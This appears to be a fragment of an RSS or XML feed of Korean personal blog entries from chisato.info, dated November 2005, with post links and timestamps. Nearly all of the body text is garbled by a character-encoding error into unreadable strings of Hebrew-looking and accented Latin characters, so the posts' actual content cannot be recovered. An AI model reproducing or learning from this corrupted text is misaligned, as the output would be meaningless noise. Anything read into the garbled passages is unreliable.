    -±׳´ֲ ְ‎´כ·־ [±׳±מְּ²¨ ´כ¾ײֳז]ְ» ¹צ¸®ֱצ´ֲ ¾ֱצ¸¸, ַׁ¹ר ֳג¿¬¿¡¼­ [±׳±מְּ²¨ ´כ¾ײֳז]ְ¸·־ ¿ְֱַ´׳ ַׁ ¹ר, [´כ¾ײֳז]ְ¸·־ ¸»ְו³­ ַׁ ¹ר, [±׳±מְּ²¨]·־ ½÷ֵה¸® ַׁ ¹רְּ¶ף´ֲ °ר½ְִ» ֳ¶ְתַֿ°װ ֱצֵ°°ם ְײ´. ֳײ±ְַ ¿¡ַַ¼ׂµו¸¦ ¿¹·־ µיְ¸י [ְ־ֵֽ³ ֳ₪ֳֶ ±׳±מְּ²¨, ´כ¾ײֳז~(¿ְֱַ´׳) ¿©ְ ¾ְֶּµנ ַֿ³× ¸¸µי¾מ°¡ֱצ°ם ¿©´כ»‎ְ־ ֳ´ ַֿ¸י µַ´ֲ °ֵ ¾ֶ³א? / ¾ְֶ¯ ¾ְֶת¾¾ ±׳·¯¸י ¾מ¶±ַ״¿ה. ±µ¥ ¾ְֶת¾¾ ¾ְֶּµנ°¡ ¹÷µ¥¿ה? / ³×? ִ«¸·׀ µנ¾ײֳז~(¸»ְו³­) ְּ¶ף°ם~] ַֿ´ֲ ½ְִּ´. ½÷ֵה¸® ַׁ¹רְ÷ ´¸¥ ְְַּ ¿¡ַַ¼ׂµו¿¡ ³¢¾מµי ¶§ »ח¿כַׁ´. ³²ְַ °³±׳¿¡ ³¢¾מµו´ֲ ¿×ְ÷ ÷ְ¼‏¾ֶ ַ׀´חְַ µֲׁ° ֱ °´¼® ֲ ְ¸®¿¡ ¾ְֹ÷ ִ³¸¯ְֵַֽ ְְ¯¹°ְּ´.
    -
    -ֱַֿצ¸¸ ַׁ¶§ ÷¹ַ׀»‎ ¿×ְ¸·־, ¶ַ ַַ´ֲ ¹°÷¸´ ֱרַֿ´ְַ µֲׁ° ¿×ְ¸·־ ְ־±ג¸¦ ¸פ¾ׂ´ר ְ¯¼¼ְ±ְַ ¼±ְֳֵ÷ ½ֹ°¢ַֿ´. ±׳ְַ »ץ·־¿מ ִ³ [±µ¥ ְּ¹ּ]´ֲ ÷¸´ֲ ְּ¿¡°װ ֲ¥ֱץְ» ְְֿ¸ֵ²´. ¹°·׀ °¡² ¿פ±ג´ֲ ÷־÷׀ְּ ¾ר´´ֲ °ַ ¾ֶ´ֿ´. ±׳·¯³× ¸»ְּ ¾ָµַ´ֲ ֱרַאְּ ´¹»ח´. ֳײ± ְ־±ג¸¦ ¾ע°ם ְײ´ֲ [¸ַ¼ױְ¸·־ ÷ֿ°ז¿ְ¸®¸¦ ¶§·ְֱג°ם ¶±÷÷ְּ¸¦ ֳ¶±°°ְּ ¾ֳ¾מ¸װְ¸¸ח ´¸®´ֲ ¸¶ְ»¹צ½÷ 2 ´½ֳ 1¿¡¼­ ¶¾מ³»¸° ְ°÷ְ´] ¾¾´ֲ ³»¿כְּ °תַֿ±ג´ֲ ֱַֿצ¸¸ ַׁ¹ר ֳג¿¬¿¡ µ־¹ר¿¡¼­ ¼¼¹ר¸¸ ¹÷¹ַֿ´ֲ °ְֽ» ³×¸§ְַ ¼±ְ¸·־ ֱצֵ°°ם ְײ´ֲ µם ַֿ´.
    -
    -
    -¼­·׀ְ÷ ְֲּכְ¸·־ ְַֿ. ±׳µיְַ [°תµµַׁ ְ¯ַא¾מ ±ג´כ±ג]°¡ ֵ« ¹®ֱ¦ְּ±ג´ֲ ֱַֿצ¸¸, ³»°¡ ֱצְַֿ°ם ½ְֽ÷ ÷־÷׀ְ÷ °ֵ±ג°¡ ¾ֶ´ֿ´ֿ±מ.
    -
    -
    -
    -
    -
    -±׳¶§±׳¶§ ´¶ף¿ה 2 °¡ ¿פ±גֱצ ¾´ֲ ±מ´. ±׳°ְֽ÷ ¸ײ¸® ְײֱצ ¾´. ¿ײ? ´הְ÷ [±¹¾מ]¸¦ ¼±ֳֵַׁ °ְַֽ ½ֶַ׀´.
    -
    -
    -
    -
    -ְְְּ ¿פ°ו´ר °ְֽ÷ ±¹¹־µי ´כ´¼צ¿¡°װ [»חְֱצ½ִ]ְּ ְײ¾ת±ג ¶§¹®ְּ´. ֶר¼ֵׂ¬·´ְַ [±ט»ש]ְּ³×, ´ץ ¿ְ·¡ְְ¸·־ °ֵ½½·¯°¡¼­ [ְוַֿ³×] °¡ ¿פ°ו´ר ְְּ¯´ֲ ¸¹ְ÷ »ח¶קµיְּ [¼צ´ֹ] ָ₪ְ÷ [´כְװ]ְּ¶ף´ֲ °זַטְ» °רְ¯ַֿ°ם ְײ±ג ¶§¹®ְּ´. ±׳µיְ÷ ±׳ ִ³¸¦ ÷¸¸י¼­ [¾מ¸׃¾מ¸׃, ¼¼»ף¿¡. ֱרֲ¥ ַ׀¿ר¼±»‎ְּ¾, ¹·־ ְת°ֵ¾]¸¦ ¿¬¹ַֿ°װ µָ´. ±׳¸®°ם ¿פְ½ְּ ³­´. ¿©±ג°¡ ֱ¿הַֿ´.
    -
    -¿µ¾מ¸¦ ְַ״¾ ַׁ´´ֲ ְ±¹¹־ְְ־ °­¹¿¡ ½ֳ´¸®°ם ְײ´ֲ ְ±ְַ ´כַׁ¹־±¹. ¿µ¾מ ַֿ³×¸¸ ְ ַ״µµ ¸װ°ם »ך´´ֲ ְַ½ְִּ ֶ״¹טַ״ְײ´. ְּ·± »ףָ²ְּ´÷¸´ֿ ַ׀»‎µיְ÷ ¹°·׀ְּ¿ה, ³×ְּ ¸¹ְ÷ ¾ְֶת¾¾µי¿¡ ְּ¸£±ג±מֱצ [¿µ¾מ°ר÷־] ¸מ ְֿ ¾ַָ״÷» »ח¶קְּ ¾רְ» ֱ₪µµ´. ¶ףµנ¿ְ¼צ¾ק, ְָ­ ָ¸ָ­, ְ½ְ¼­, ַ׀¿ר, ½÷ֵֽµנֵ¬·´.... »ך°£ ¿ְֱצ¿¡¼­ ֶ¼÷ךְּµµ ¾רְּ »ח´ֲ »ח¶קְּ ¾ֶ´ֱׂר´כ, ¿µ¾מ±³½ְ¿¡ ´כַׁ »חְֱצ½ְִּ ¾ר´ֲ »ח¶קְּ ְײְ¸·× ½ְֽ» ֱ₪µµ´.
    -
    -[±׳¶§±׳¶§ ´¶ף¿ה]°¡ ¿פ°ו´ר °ְֽ÷, ְּ ÷־÷׀ְ» °ר·«ַ±ג ¶§¹®ְּ´. ±׳µיְַ ¾ֵֽ¸® ¿µ¾מ±³½ְְ÷ ÷¸´ֲ ְּµי¿¡°װ ְ½ְֵַ »‎ָ°ְ» ²ר¾מ³»°װ ַ´ר °ְּֽ´. ¹«ְַ½ִ ֱ¿¡ »ח¶קµיְ÷ ±׳µיְּ ÷¸¿©ֱ״ ÷־÷׀¿¡ »ף»ףְ» µ¡÷ְֿ ¼צ ְײ°װ µַ¾מְײ´.
    -
    -
    -
    -±׳·±µ¥ [±׳¶§±׳¶§ ´¶ף¿ה 2]´ֲ ´¸£´. ±¹¾מ¸¦ ֵ¸°ְ¸·־ ַ´. ±׳·¡¼­ ¾ָ ¿פ±ג´. ¿ײְ־ֱצ ְֱּ¦´ֲ ´הְ» ¾ֻ ¼צ ְײֱצ ¾ְ÷°¡?
    -
    -
    -
    -
    -
    -´כַׁ¹־±¹ ±¹¹־µי ֱ¿¡¼­ [±¹¾מ¸¦ ±³½ְ]¹¾ׂ´ר ְּµיְַ ¼‎ְ´ֲ ´כ·« ¾ף¸¶³× µֹ±מ?
    -
    -
    -
    -
    -ֶַם¾רְּ ³·ְ÷ ¼‎ְְֿ °ֵ´. ±¹¾מ¶ף´ֲ °ַ ֳ¥ְּ³× ¿­½ָֹק ְ׀°ם ¼צ¾קְּ³× ¿­½ָֹק µט°ם, ±׳µµ ¾ֶ´ֿ¸י ¿ר·¡ ְ¿¬½÷·´°װ µַ´ֲ °ֱֵצ ַ׀¿ר ´´ֿ´ֲ °װ ¾ֶ´ֿ¶ף°ם »‎°¢ַֿ´ֲ °ת¸סְּ´ֿ±מ. ´כ÷־÷׀ְַ ´כַׁ¹־±¹ »ח¶קµיְּ ±׳·¸´. ±¹¾מ ַ׀¿ר ´´ֿ´ֲ, ָ₪ְ÷ ´³א÷» »ח¶קµיְ÷ ¾מ¶² ְּµיְֿ±מ? ±ג²¯ַ״¾ ¼צ´ֹ¾נ¾מ¿µ¿×ְ» ֱ״÷סַֿ±ג ְ§ַׁ ַ׀»‎µי? °ם±³ֱ״÷סַֿ´ֲ ֱ3µי? ³× ¿×½ֳµµ ±¹¾מ±³½ְְ» ¹¾ֶ÷¸¾ֱׂצ¸¸, ְּ°ַ ´כְְֱ־ ַצ»ףְ÷ ¾ֶ´ֿ´. ±³ְ°¿­ְּ ְ±¹¿¡¼­ ֱ¦ְֿ ֲק°ם ³ִׁ£´´ֲ ¼­¿ן, ±׳µµ °­³² ְֿ÷־¿¡ ֱ‎ֱµָ ַצ»ף¿¡ °¡±מ¿ן °ְּֽ´.
    -
    -°בֱ₪ְְ¸·־, ¾מµנ±מֱצ³× ֳֳרַֿ°ַµ¥, [ֳִֵץ µ־ »ח¶ק ְֳ¼µµ ±¹¾מ±³½ְְ» ¹¾ֶ÷» ְְּֿ ¾ר´]°ם ¿¹»ףַׂ ¼צ ְײ´. ±׳·¯´ֿ ¿ר÷»ְּ ¾ר´. ֶ׀·¯µנ¸¦ ַׂ·¡µµ °ַ´צֱצ°¡ ֱ¸ְח¸¦ ¾´ֲ´. ¾מ¶±ֱַֿצ? ְּ·¯´÷¸¸י ¾ןֱצ¸¦ ½ב¾ ַֿ°װ µַ´ֲ °ֵ´. ±׳·¡¼­ ¾ָ ¿פ±ה´. °ב±¹ ½ְֱֳַׁצ ַׁ ´µµ ¸ר µַ¾מ¼­ ´½ֳ ֵ¬·־ֲ¡ְ÷ [ַא´װ¾ֶ]°¡ ²ח¾מֳ¡´.
    -
    -
    -
    -±¹¾מ ±³½ְְ÷ ¿µ¾מ ±³½ְ°ת ´¸£´. ±׳µיְַ [»ץ·־¿מ ¼צ¾ק]ְ÷ ´חֳי ¸פְװְּ ¾ָ µַ°ם ְײ´. ±׳³ֹ ¸»ְו³­ְַ ¿¬¼׃ְֿ »׃ְּ´. ½÷½÷·־µיµµ °¥ַַ¸¦ ¸ר ְג°ם ְײ´ֲ °ְּֽ ÷¸ְ־´.
    -
    -
    -ֱ₪ֲש¿ל ¾¾¿¡°װ °םַׁ´. ֱצ±ְּ¶ףµµ ±׳ ִ³ ֶק±גַ״¶ף.
    -
    -¾ֶ´ֿ¸י ֱרֱצַֿ°װ ±¹¾מ±³½ְ ֱ» ¹ְ¸·¯ ´³א¶ף. ±¹¾מַ׀¿ר ¼±»‎µיְַ ½÷ֵ¸ְְֿ÷ ¿µ¾מַ׀¿ר ¼±»‎°ת ´¸£´. ´ח½ְֵּ ֱצ± ַֿ´ֲ °ֽ ֳ³·³ ±¹¾מ °¡¸£ִ¡´ֲ ¼±»‎ְ÷ ¾ר´. ±׳·¯´÷¸´ֿ ±¹¾מ ±³½ְ µי¾ת´ר »ח¶קµיְ÷ ´ח½ְֵּ ֱצ± ¹¹ ַֿ´ֱֲצ ¾ֻ ¼צ°¡ ¾ר´. ¸פְװְּ ¾ָ µָ´.
    -´ח½ֵ¸¸ µי¾מ÷»´°ם ַ״°בµַ´ֲ °װ ¾ֶ´ֿ´. ´ח½ְֵּ ֱ¦´כ·־ ±¹¾מ±³½ְְ» ְח¿¬ַ״÷ְֳ, ±¹¹־µיְ÷ ±¹¾מ±³½ְְ» ¸נ¸¥´. ±׳·¯´ֿ ´חְו ְ±¹¹־ ±¹¾מ±³½ְ¹±ג ¿מµ¿ְּ¶ףµµ ¹ת¿©¾ 6°³¿ש ִָ ֱמְ½ ¿פ±ז ¼צ ְײ´ֲ ֱצ°זְּ´. ±׳°ֵ ¾מ·ֶ´. ±׳³ֹ, ±׳ ִ³ ֶק±גַ״¶ף.
    -
    -
    -
    -
    -
    -»ח½ַ °³ֶם ְ¿¡ ¿©±גְת±ג ְ־ֵֽ÷ה ַֿ°ם ´´ׂ¶§ ÷־ֵֽ °ֱֶ₪½÷·´±ג´ֲ ַ¾ת´. ´כֳ¼ ¾מֲ¼ְ°ם ְּ°ֹ·־ ¿פ±גְ°ם ַֿ´ֲ°ֱֵצ. ¾מ°ֱֵצ³× ¾²´ֲ °ֵ ¾ֶ³ִ? ¿פ±ז¸®°¡ ¾רְ¾ֶ, ¹¹ ±׳·± »‎°¢ְּ¾תֱצ¸¸ ±׳·¡µµ ַׁ¹ר ÷¸ְ ½ֽ¾ת´ֲµ¥ ¾ֶ´ֿ³× ´¸¦±מ´.
    -
    -¹°·׀ ¿ֲ ±¹¹־ְּ ¿µ¾מ±³½ְ¿¡´ֲ °½ְֹּ °¡µזַֿ¸י¼­ ±¹¾מ´ֲ ±³½ְְ» ¹¾ֶ÷» °זַטֱ¶ֲק ¾ר´´ֲ °ַ ¸¶ְ½ ¾ֲֶַ ְְּֿ´. ֱַֿצ¸¸ ¾מֲ¼°´ֲ°¡. ±׳·¸´°ם ´ח½ֵµי °³±׳¸¦ ÷¸¸י¼­ [±׳·¡, °ב½ַֹ¾מ. ±¹¾מ ַ׀¿ר ´³א¾°¾מ] ַׂ »ח¶קְ÷ ַׁ ¸םµµ ¾רְ» °ְֽ».
    -
    -
    -
    -
    -
    -¾½ֲֹק°װ µ¹¾ֶ¿װ´°¡ ¹°·¯³×±ג ½±ֱצ ¾ְ» °ֵ¶ף´ֲ ֱ¡ְ» ְ ¾ָ´. ±׳·¡¼­ ¾ֶ¸¶ ֳִֵץ´ֲ ְּ ִ³¸¦ ¹צ¸®ֱצ ¸רַׂ °ֵ´. °ט¼׃ַ״¼­ ֱתֱת ²ר°ם °¥ֱצµµ ¸נ¸£°´.
    -
    -ֱַֿצ¸¸ [°¡¾ַׂ ¶§°¡ ¾נֱ¦ְ־ֱצ ÷׀¸םָק ¾ֻ°ם ¶°³×´ֲ] µ¸נ½ְְ÷ ¾ֶ¸§´ה´°ם ַ´. ֱַ·־´ה°װ °¡ְ. ְּ¹ר °ֽ, ְ¸רµַ¾ת´°ם ¼ײֱקַֿ°װ ְ־ֱ₪ַ״¶ף. ±׳·¸°װ ֱַֿצ ¾°ם¼­¾ ְְ÷¸´ ³×ְ» °ֽ ¾ר´ֲ ¼׃ֶם¿¡ ±ג´כ¾מ ְ½ֵµיְַ °¡´ֹ¼÷¸¶ְת ±נ¾ֶ¸װ°װ µַ°ם ¸»ֵ׳´ֿ±מ.]]>
    -±׳°ְֽ» ¾ֻ·ֱֱײ¸¶ ! -ַֿ³כ¾ֶ -Sun, 20 Nov 2005 16:15:52 +0900 -
    - -¸¶ֳק ֱ״ ¹צ´׳¸נµו?! -http://chisato.info/blog/index.php?pl=670 - -
    -
    -¹·־ ¿ה°ֽ.
    -
    -
    ²ֹ÷¸´ ³²ְ µו¶ף¸¶ ¹צֱ¯ ! (ְֿ÷»ֶַ)

    -
    -
    -¿ל¿ֽ.. ֱ₪¸» ְח¹ְּײ½ְ´ֿ´. ´כ¸¸ְֶַ÷ ַׁ ¹ר ÷¼·ֱ´°¡ µ¥±¼µ¥±¼ ±¸¸£°ם(¿פ°¼­) ¸»¾ׂ´ֲµ¥.. ְּ°ֵ ֱרֲ¥ ´כ¹ְּ³׳¿ה. ¿רְ°ת °ְֵַ ¿ֿ÷®ַֿ°װ ½ֵּ©ַֿ°ם ְײ¾מ¼­.. (´כ¸¸ְֶַ÷ ¿רְ ִ¹ֽ½÷ ÷¸´´ֲ ְֿ÷»¿¡¼­ 95³גµµ¿¡ ¸¸µי¾מֱ³´ר ±״ְוְֶַּ´ר°¡, ±׳°ֹ ÷¸°ם ¸¸µח °ֽ °°¾ׂ°ֵµח¿ה. ±׳ ְַ°ְ÷ ֱרֲ¥ ÷°·־ְ׃)
    -
    -ְֿ´ ¾מ¸° ³²ְ¸¦ ֱֱ¾ֱֶַֿצ ¾¾ֶ¼­.. °װ´°¡ ְת´ֲ ְנ´ֿ½÷ ½ֵּ©¸נµו´ֲ ¿רֳ¼°¡ ¾ֶ´ױ´ֿ´. ֱַֿצ¸¸ ְּ¹ר¿¡´ֲ ¸¶ֲך ֱ״ !! ְנ´ֿ½÷ ! ¹«·ֱ ¾ֶ¶ף½ֳ !
    -
    -
    -÷¼ ¼צ·ֿ ±ֽ¿±½ְ´ֿ´. ¿רְ ִ¹ֽ½÷¿¡¼­µµ ֳקִ«»ח¸¦ ֱֱ¾ֱֶַֿצ´ֲ ¾¾ׂ½ְ´ֿ´. ´©±¸¿´´ֲ°¡ ַֿ¸י.. ָ®½ַָק ִ¹ֽ½÷¸¦ ֱס°ּ°װ ְ׀±ג´ֲ ַ¾מµµ ±׳ ´©±¸¿¡°װµµ ½ֵּ©µֱַצ ¾¾ׂ´, ´ֲ ְֲּ ֱ₪´ה? ְת´ֲ ַֿ³×¿ה¸®´ח°ם(²ֹ÷¸´ ³²ְ)¸¦ ÷°·־ ֱֱ¾ֱֶַֿצ ¾¾ֱׂצ¿ה.. ±׳ ¹«·ְֶַ ְִֶַֿ¹ֽ½÷ ֱ¿¡´ֲ ¿ְָק·ֱ ¿ְ¸¶ְּ´¸µ(¿ל¿¡´ ¹ּ¿ֽ) ְֲַ ֱצֱצְ¿´ְ¸´ֿ±מ¿ה(¹°·׀ ¿ְ¸¶ְּ´¸µ ְ÷ °נ ¸¶¹«¸®°¡ ֱצ¾מֱ³°ם ַֿ³×¿ה¸® ְֲ÷ °ט¼׃ µַ´ֲ ¹¶ק¿¡ ½ֳ´כ°¡ ²ְ ¸ֲ´ֲ´°ם´ֲ ַׂ ¼צ ¾רֱצ¸¸).
    -
    -ִ¹ֽ½÷¿¡¼­ ÷¸¿©ֱײ¾ת´ר [¸»µµ ¾ָ µ. ¿ױ ֲ¥ֱץ³²] ¼³ֱ₪µµ °ְֵַ ´ ±״÷¹ַׁ »ףָ²ְװ´ֿ´. ½÷ֵה¸®°¡ ´ץ ³×ְ÷ µם. ±׳¸®°ם ְֿ÷» µו¶ף¸¶ ´ה°װ ¼׃µµ°¨ְּ ְײ¾מ¼­ ±׳ ֱ¡µµ ֱֱ½ְ´ֿ´.
    -µ־°םµ־°םְַ ¸םְµו¶ף¸¶(¿¹¸¦ µי¸י ¹יַׁ¹רֲ° ֱַ·־ֶקֱמ, ¶ף°ֵ³× ַֿ´ֲ..)·־´ֲ ְ‎´כ ֶםְװµֹ ¼צ ¾ר°ֱצ¸¸ ְ¾מµµ ֵ°¹ּ¿ֶֽך(±׳·¯°ם÷¸´ֿ ְּ°ֽµµ ¸¶ֲך ֱ״?) ¼צֱ״¿¡¼­¶ף¸י ´ץ ³פְּ »ח°ם ½ֽ½ְ´ֿ´.
    -
    -
    -
    ֱֶסְ» ¸ֲֳ°ם ְײ´ֲ ¿·־¿מ ֳקִ«»ח ±÷
    ¸¶ֲך ֱ״ְַ ¿¬±ג°¡ ְַ¿·־ ³×¿ֱֽײ¾מ¼­ °¨µ¿ְװ´ֿ´. ¹°·׀ ְ½ֵ¿¡°װ ֵ« ÷¯½ְֵּ µֹ ִ³¸¯ֵֽ´ֲ °ַµו¸®ֱצ ¾´ֲ °ֽµµ °°½ְ´ֿ´¸¸.. ±׳·¡µµ ³×¸§´כ·־´ֲ ¼ׂ¼ַֿׂ°װ ÷¯½ְֵ» ³כ·ֲַֿ°ם ְײ´ֲ °ְּֽ ÷¸ְ־´°ם ַׂ±מ¿ה. ¹¹¶צ±מ, ¿ל¸®³×¶ף·־ ַֿ¸י ÷ס(ֱ₪ֱצֶָ)¶ף°ֵ³×. ¿×½ֳ ֱ₪ֱצֶָ ´¿מ ¿×ַׂ¸¸ µי¾מ¿ֹ´ֿ´¸¸, ±׳·¡µµ ³×¸§ְַ ³כ·ְֲ÷ ְ׀ָק°ם ְײ°ם ±׳ ֱ¡ְּ ְֱֱ÷ ֱ¡¼צ¸¦ ¹°ם ְײֱצ¿ה, ±׳ »ח¶ק.
    -
    -
    -°װ´°¡ ´¸¥ ִ³¸¯ֵֽµיµµ ²ֿ ֱֱ½ְ´ֿ´. ¹°·׀ ֳ³ְ½¿¡´ֲ ½ַֹֿ°װ ¶´ֲ ±ג÷׀ְּ¾תֱצ¸¸(¸¶ֵ°³כ ֳקִם½ֳ¸¸ ֱ» ¾מ¿ן·ָ´ר µם..) °ט¼׃ ÷¸´÷¸´ֿ ¾מ´ְ»ץ ½ֵּ©..;; ְּ°ֵ ¹«¼­¿מµ¥¿ה. ¾מֲ·µח ֳ³ְ½¿¡´ֲ ·חְּ(¿ְ±¸¸® ½´¿מְּ ¸ֳ¾ׂ´רµ¥..)÷־ֵֽ ½ְֳַ״¼­ ְֱּ¦ ¼ֱׂצ·־µµ ½½½½ ¸פְװ ְֱװ´ֿ´. ¹¹, ¿©ְָק ¾ֵֶ°¶ף´ֲ ֱ» ¿¡¶ףִ³¶ף;; ±׳·¡µµ ´כ·« 6ָ­ ֱ₪µµ ֱרַאµַ¸י ¾מ´ְ»ץ ¾ֵֶ°¶ף¿¡µµ ְְּװµָ ְ½ְֵ» ¹°ַׂ °ֽ °°¾ֶ¼­ ֱ» °ֱֶ₪ְװ´ֿ´.
    -
    -½ַֹֿ°װ ±ֽ¿©¿מ °ְֽ÷ ְ¯ֵ°. ¿רְ°ת´ֲ ְּ¹ֱּצ°¡ ֱ» ´¸¨´ֿ´¸¸, ±׳ ֱ¡ְּ ´ץ ³×ְ÷ °ֽ °°±גµµ ַ״¿ה. °װ´°¡ ¸¶ֳק½ֳ¸¶ ³×³×ִ.. ְ ְּ »ח¶ק ÷°·־ ¾ָ ֱֱ¾ֶַױ´ֿ´¸¸ µמְוָ½¼צ°¡ ÷°·־ ¸¹ֱצ ¾ְ÷ ֳק¹ֵ°ְַ ¼³ֱ₪ְ» 100% »ל·ֱֱ ¼צ ְײ´ֲ °ַ ¿×½ֳ ¸¶ֳק½ֳ¸¶ ¿´±÷¿ה. ְ¾מµµ ְֿ÷»ְ־µי¿¡°װ ¸¶ֳק½ֳ¸¶ְַ µמְוְ¸·־ ֳק¹ֵ° ִ³¶ף¿¡ ´כַׁ ÷־¿¬¼³¸םְ÷ ֶ׀½÷ ַׂ ¼צ ְײ°װ µַ¾תְ¸´ֿ±מ ¸»ְֱּצ¿ה.
    -
    -
    -
    -ַֿ¿©ֶ°.. ±׳·¡¼­ ¿­½ָֹק ÷¸°ם ְײ½ְ´ֿ´. ֵ°¹ּ¿ֶֽך..ְ÷ ¾ֱֶק ¸¶¹«¸® ¸ר ֱצ¾ת°ם. ֱַֿצ¸¸ ַֿ³×¿ה¸®´ֲ µ ֲ±מֱצ ְ÷־ ¾ֻ°ם ְײְ¸´ֿ±מ, ְתְַ °םֱתְְ־ ¹®ֱ¦ֱ¡(ֱײְ־°רְּ ¿ְַ״¸¦ ¹°ֵ³×, °ן°ז¿¡ ֳ³ַֿ¸י ¸¶±¸ ¸¶ְ½ְּ ֱ¹¿©¼­ ´ץ ֱרµµ¸¦ »©ֱצ ¸רַׁ´)ְ÷ ַ״°בµָ ¼ְְװ´ֿ´.
    -
    -4ָ­±מֱצ ֱרַאµָ »ףָ²ְ־µ¥ ְּ¹ּ ·חְּ´ֲ ¶°³µ°ם ֳקִם½ֳ¿ֽ ֳקִ«»ח´ֲ »ח±ֽ°ם ְײ½ְ´ֿ´. ¿ְָ׿ְָ×.. ½÷ַַµנַׁ ֱרַאְּ ֱ¦ְֿ ְֱֱ÷ °ֽ °°¾ֶ¿ה. ±׳¸®°ם ¸¶ֲך ֱ״(ֶר¼ׂ).
    -> ±׳·¯°ם÷¸´ֿ ֱ¦¸ס¿¡´ֲ ¸¶ֳק ֱ״, ÷»¹®¿¡´ֲ ¸¶ֲך ֱ״.. ¿ה·¸°װ ¾²°ם ְײ±÷¿ה. ְ½..
    -
    -
    -
    -ַֿ¿©.. °ר÷־µµ °ר÷־ְװ´ֿ´¸¸ ְֿ÷»¾מµµ ´½ֳ ½ְֳַׂ±מ ַֿ°ם ְײ½ְ´ֿ´. ְְּ¯´ֲ ¿×½ֳ ¸¶ֲך ֱ״ ְֿ±מ³×. µִֽלֵ¸¿צ¸¦ ְ׀¾מ÷¸°ם ½ֽ¾מֱ³¾מ¿ה. ¿µָ­¸¦ ½ג ֱֱ¾ֱֶַֿצ´ֲ ¾¾ֶ¼­ ¼ׂ¼³·־ ְ׀ְ»±מ ַ´ֲµ¥ ±¹³»ְֶַ÷ ַ¥ֱצ°¡ ֱ₪¸» ´¸´¸ ´ץ±÷¿ה(µנְְ־µµ ְ¸¾ְַּ¾תֱצ¸¸ ְ¢ ַֿµוִ¿¹צ.. ¿ה»ץ´ֲ ַֿµוִ¿¹צ ¾ֶ´ֿ¸י ְְּֿ ¾ָµָ´´ֲ °ּ´ֿ±מ?). ְּ·¸´¸י ÷° ¼צ ¾רְּ ¿ר÷»ְ» ְ׀¾מ¾ ַֿ´ֲ °ֵ¾? ֱַצ¸¸ ±׳ »חְּ ½ֹ°¢ַֿ°װ ֵנָ­µָ ְֿ÷»¾מ ½ַ·ְֲ¸·־´ֲ ְ‎´כ ¹«¸® !! .... °ר÷־ַ״¾ ַֿ´ֲ °ֹ±מ, ¿¡ִם´ֿ °¡¿ְ¸®¸¦ ְ§ַֿ¿©?! (ֶ²·ֱ)
    -.... ַֿ±ה µµִלֵ¸¿צ´ֲ ¿ר¼­µµ ַֿµוִ¿¹צ´ר°¡. .... ¾ֶ¾ֶ~~ ְת´ֲ ַֿµוִ¿¹צ÷ְּֿ ³¹« ½ָ¾מ¿ה;; »ל·ֱ´°¡µµ ¹°·¯¼¶. ְ°ר¼­µµ ַֿµוִ¿¹צ´ֲ ַַַ״´³ז´ֲµ¥¿¡~~
    -
    -ֱ₪½ֵ¾רְּ ֱצ³»°ם ְײ½ְ´ֿ´. ֳײ± ֳ¥ְו ֱ₪¸®ַ´ֲµ¥, ְ°ר¼­¶ף°ֵ³×.. ¿ה»חְּ °ר÷־ַֿ´ֲ ¸נ °ת¸סְַ ֳ¥ ÷¸´µµ ְ־¹®¼­°¡ ´ץ ¸¹ְּ ³×¿ֽ¼­ ְֱֲ‎ַ½ְ´ֿ´. .... ֱצ±ְּ¶ףµµ ֱר·־¸¦ ֶ²¾מ¾ ַׂ±מ? ַֿ´ֲ »‎°¢ ַֿ±ג¿¡´ֲ µµֱֲַֿק ½ְָ¸´ֿ±מ, ַֿ´ר °ְֽ÷ ¸¶ְת ַ״÷¸°¾מ¿ה.
    -
    -
    -
    -
    -
    -+ µ¡.
    -±׳³×ְת³× ´¸µְ÷ ¿±¹ְ־ ¹ר¿ֶם2 (¾צ¸¶ְַ ¿ה¸®¿¡ ´כַׁ ֳ¥..) ְ÷ ¿ײ ¾ָ µי¾מ¿ְ´ֲ °ֱֵׂ.
    -ְֿ÷» °¬ְ» ¶§ »ח¿װ¾מ¾ ַ´ֲµ¥. ְ׳.
    -
    -+ µ¡2.
    -ִ¡ֵכְּ ½ַֹ״¼­ ֵ«ְְֿװ´ֿ´. ¹ְ÷ ½÷ֶ®·¹½÷ ¼÷ְ־ °ֽ °°ְ÷µ¥, ±׳°װ ´ץ °ם¹־.]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Sun, 20 Nov 2005 12:12:28 +0900 -
    - -°ם¹־°ם¹־.. -http://chisato.info/blog/index.php?pl=669 - -
    -¿·¿¡ ¿·¿¡ ¾ֶ°¡¾¾´ֲ ֱ₪¸» ¿ְ·§µ¿¾ָ ½־ְּ ְֱּ½ֳ´. ¼¼»ף¿¡, ְת ֱ‎ֱ·ֲ.
    -
    -ְֿ´ ְִִּ ¸מ ´כ ¾ר°ם.. ¿צ³« ְ־±ג ¸¹ְ÷ (°ֽ °°´. ´¸¥ °ק ÷¸´ »ח¶ק ¼צ°¡ ±²ְוַװ) °ר°£ְּ¶ף ³×µµ ¿ְ·¡ ±ג´¸®´°¡ ִִ¾²°װ µַ¾ת´ֲµ¥..
    -³»°¡ ±ג´¸®±ג ְ÷־ֵֽ ±׳³א´ֲ ְת ְ¸®¿¡ ¾ֹ¾ְֶײ¾תְ» °ֵ´. ¿װְ» ¶§÷־ֵֽ ¹ת½ב ְײ¾תְ¸´ֿ±מ..
    -³×´ֲ ְֲֲַַׁׁ» ±ג´¸®´°¡ °¿ל°¿ל ְ¸®¿¡ ¾ֹ¾ׂ´. ±׳¸®°ם ְֱּ¦ °¡·ֱ°ם ַׁ´. ±ג´¸° ½ֳ°£±מֱצ ַױַֿ¸י 1½ֳ°£µµ ´ץ ֱצ³­ °ֽ °°´.
    -
    -
    -
    -±׳·±µ¥ ¿©ְָק ±׳³א´ֲ ¹ּ´ָֿ¨ַַ ¼ר·, °¸®.. ¹¹ ±׳·± °ֽ¿¡ ¿­ֱ ְֱּ´.
    -
    -
    -
    -
    -¡״ ±ת´גְ½
    -
    -1. ָ¸»ח¿¡¼­ ¹ּ´ָֿ¨ַַ ֲק´ַֿ´ֲ ְְּ¯¸¦ ¾ֻ °ֽ °°ְ÷ ±ג÷׀ְּ¾ת´.
    -2. ¼¼¿ש ֲ. .... ³»°¡ ֱ» ´ץ ¾מ¸± ¶§´ֲ ¿¥¿¡¼¾¿¡ ֱ׳ְ»חְ ¸ֵ´¸° »ח¶קµי ¶§¹®¿¡ ´«»לֲמַ׸± ְְּֿ ¸¹¾ׂ´ר °ֽ °°ְ÷µ¥.
